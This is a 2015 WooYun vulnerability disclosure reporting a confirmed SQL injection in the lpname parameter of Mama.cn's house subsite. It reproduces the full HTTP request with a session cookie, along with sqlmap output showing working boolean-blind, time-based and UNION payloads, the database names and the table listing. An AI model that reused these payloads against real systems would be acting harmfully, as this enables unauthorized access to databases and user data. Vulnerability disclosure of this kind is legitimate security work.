当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0155011

漏洞标题:妈妈网某分站SQL注入漏洞

相关厂商:妈妈网

漏洞作者: 路人甲

提交时间:2015-11-22 18:32

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-22: 细节已通知厂商并且等待厂商处理中
2015-11-26: 厂商已经确认,细节仅向厂商公开
2015-12-06: 细节向核心白帽子及相关领域专家公开
2015-12-16: 细节向普通白帽子公开
2015-12-26: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

RT

详细说明:

POST /index.php?a=index&&g=Loupan&m=Search HTTP/1.1
Content-Length: 198
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://house.mama.cn
Cookie: PHPSESSID=1hva6rnsv4n5qbvd1bgms9kk45; liveCity=gz; xloginmama_service=http%253A%252F%252Fhouse.mama.cn; MAMADATA53=mama_rp=0&si=c0f92e0a5686619288df116ad6a96749&ltime=1448121306945&rtime=0&sinfid=1&sinpage=__&location=http%3A%2F%2Fhouse.mama.cn%2F; zbd10_Loupan-Search-index=1; zbd10_House-Index-index=1
Host: house.mama.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
areaid=&lpid=0&lpname=-1&s1=%e6%96%b0%e6%88%bf&spriceid=&wytypeid=


lpname参数存在注入

sqlmap identified the following injection point(s) with a total of 136 HTTP(s) requests:
---
Parameter: lpname (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: areaid=&lpid=0&lpname=-7778') OR 6498=6498 AND ('qDIr'='qDIr&s1=%e6%96%b0%e6%88%bf&spriceid=&wytypeid=
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: areaid=&lpid=0&lpname=-1') AND SLEEP(5) AND ('BjkF'='BjkF&s1=%e6%96%b0%e6%88%bf&spriceid=&wytypeid=
Type: UNION query
Title: Generic UNION query (NULL) - 12 columns
Payload: areaid=&lpid=0&lpname=-1') UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a786271,0x4d44627454694f5772506b7a7a626b446546735a6762665a52685358545573637a6562657a726c67,0x7171706271),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&s1=%e6%96%b0%e6%88%bf&spriceid=&wytypeid=
---
web application technology: Nginx, PHP 5.3.27
back-end DBMS: active fingerprint: MySQL >= 5.5.0
banner parsing fingerprint: MySQL 5.6.23, logging enabled
banner: '5.6.23-log'


web application technology: Nginx, PHP 5.3.27
back-end DBMS: active fingerprint: MySQL >= 5.5.0
banner parsing fingerprint: MySQL 5.6.23, logging enabled
banner: '5.6.23-log'
available databases [11]:
[*] baby_grow
[*] home
[*] house_mamadb
[*] information_schema
[*] jiaju_del
[*] mama_living_expense
[*] mamaPhoto_del
[*] mysql
[*] performance_schema
[*] pinpai
[*] test


Database: house_mamadb
[46 tables]
+---------------------------+
| h_admin_user |
| housesina_art |
| housesina_art_1 |
| housewangyi_photo |
| hs_category |
| hs_category_config |
| hs_city |
| hs_collect_data |
| hs_collect_data_content |
| hs_collect_rule |
| hs_collect_source |
| hs_collect_source_cate |
| hs_edit_block |
| hs_edit_block_bk20121103 |
| hs_edit_history |
| hs_forum_house_thread |
| hs_house_loupan_link_cate |
| hs_house_loupan_link_list |
| hs_house_tclink_cate |
| hs_house_tclink_list |
| hs_loupan |
| hs_loupan_developer |
| hs_loupan_group |
| hs_loupan_info |
| hs_loupan_map |
| hs_loupan_paihang |
| hs_loupan_price |
| hs_loupan_tongji |
| hs_news |
| hs_news_20110908 |
| hs_news_cate |
| hs_news_comments |
| hs_news_hot |
| hs_news_pic |
| hs_news_tongji |
| hs_news_tongji_detail |
| hs_news_zt_cate |
| hs_news_zt_list |
| hs_photo_cate |
| hs_photo_pic |
| hs_photo_tongji |
| hs_photo_tuku |
| hs_sends |
| hs_tuan |
| hs_tuan_activity |
| hs_tuan_activity_pic |
+---------------------------+


漏洞证明:

修复方案:

求高rank...

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-11-26 22:58

厂商回复:

非常感谢

最新状态:

暂无


漏洞评价:

评价